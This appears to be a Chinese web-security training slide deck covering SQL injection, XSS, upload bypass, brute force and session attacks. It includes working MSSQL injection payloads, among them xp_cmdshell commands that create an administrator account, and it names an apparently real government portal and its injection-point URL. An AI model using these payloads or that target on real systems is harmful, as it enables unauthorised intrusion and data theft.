应用与开发安全

聂万泉(Wquan.Nie)

CISSP(Associate) Advanced programmer Email:SoftDev@c‐

QQ:256796

MSN:nagemeiyou@

¾常用的Web攻击手法¾如何安全的与用户交互¾加密技术Web开发应用¾Web开发与数据库安全¾Web安全测试

¾Sql Injection

¾Xss(跨站脚本攻击)

¾bypass Upload

¾Brute Force(穷举)

¾Session Spoof

¾Remote/Local File Include

¾程序向程序文件内写入参数¾其它攻击方法

利用现有的应用程序没有对用户输入数据进行检查和过滤的缺陷,将恶意的SQL命令注入到后台数据库引擎执行,达到获取数据,甚至控制数据库服务器的目的．

典型例子:

/index.asp?id=8and (select count(*) from sysobjects)>0

•Sql注入的漏洞是在编程时造成的

•后台数据库允许动态ＳＱＬ语句执行

•前台应用程序没有对用户输入的数据或者页面提交的信息进行必要的安全检查

•数据库自身的特性造成的，与编程语言无关．

•绕过防火墙进行攻击

•绕过web应用程序的验证过程•非法越权操作数据库内容•随意篡改网页内容

•添加系统帐户或数据库帐户•上传和下载非法文件

•本地溢出并获取系统最高权限•安装木马后门网络僵尸

•JSP应用程序

•PHP应用程序

•Asp应用程序

•.net应用程序

•MSSQL (危害最大)

•Mysql

•Oracle

•其它数据库Sybase,DB2,Access

小榕工具WIS,WED NBSI

阿Ｄ注入工具

明小子 …………

1.判断是否存在注入

在页面地址后面加’|and 1=1|and 1=2

返回显示错误或不正常代表有注入漏洞

2.判断数据库类型

Id=1 and (select count(*) from sysobjects)>0

可判断是ＭＳＳＱＬ还是ACCESS

3.判断当前权限

Id=1 and 1=(SELECT IS_MEMBER(\'db_owner\'));‐‐

db_owner可更换成其它mssql角色名比如ＳＹＳＡＤＭＩＮ

4.检查扩展存储是否存在

Select count(*) from master.dbo.sysobjects where xtype=\'x\' and

name=\'xp_cmdshell\‘

5.SA权限模式下建立系统用户

;exec master.dbo.xp_cmdshell \'net user hacker 123456 /add\'

;exec master.dbo.xp_cmdshell \'net localgroup administrators hacker /add\'

z http://61.49.38.1/wssp/shenbaofront/index.jsp

海淀区人民政府行政办事中心‐网上申报平台

注入点:

http://61.49.38.1:80/wssp/shenbaofront/question_text.jsp?act=questioninfo&que stion

检测截图:

z Cross site Scripting (XSS)

黑客在应用程序中非法插入ＨＴＭＬ代码当受害者浏览该页时，嵌入其中的恶意代码会被执行,从而达到恶意目的．

z XSS的攻击类型

1.跨站点的攻击,特指在虚拟主机上的攻击方式．

2.针对session,Cookie的劫持攻击

3.恶作剧攻击

4.Xss攻击通常要与社会工程学结合起来使用

5.模拟用户完成多页表单。

•XSS攻击导致恶意攻击者

1.绕过访问控制

2.权限提升

3.篡改网站页面

4.得到敏感信息(用户帐号,密码,信用卡等)

5. 其它

•敏感数据被获取(Cookie 盗窃)•网络钓鱼

•获取Web用户浏览的网页内容•Session Riding(CSRF攻击)

•获取用户的键盘击键数据•Web僵尸,典型工具为Xss_Proxy •Xss蠕虫

1.怎么检测XSS

2.怎么样利用XSS

…

3.抓取管理员的Cookie/session,欺骗服务器提升权限

z上传程序对上传文件的扩展名验证不严z构造图片包头欺骗服务器

z对网页的验证表单能过使用字典或组合算法的方式进行暴力猜解.

z只要时间足够,破解的成功率是%100,但时间也不是常人可以接受的.

z该攻击方法需先旁注成功取得服务器中某一站点的权限.

z通过修改服务器中的Session表,提升Session 中的权限等级.拿下其它站点中用户的管理员权限